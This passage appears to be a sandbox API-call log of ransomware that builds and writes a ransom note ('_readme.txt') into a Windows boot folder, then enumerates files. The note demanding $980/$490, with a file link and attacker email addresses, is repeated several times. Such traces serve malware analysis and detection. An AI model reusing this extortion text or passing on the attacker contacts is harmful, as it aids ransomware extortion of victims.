(pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0056.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.156] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.156] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.156] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.157] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.157] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.158] CloseHandle (hObject=0x5c8) returned 1 [0056.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.158] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.158] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.158] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.158] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.158] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0056.158] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.159] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.159] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.159] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 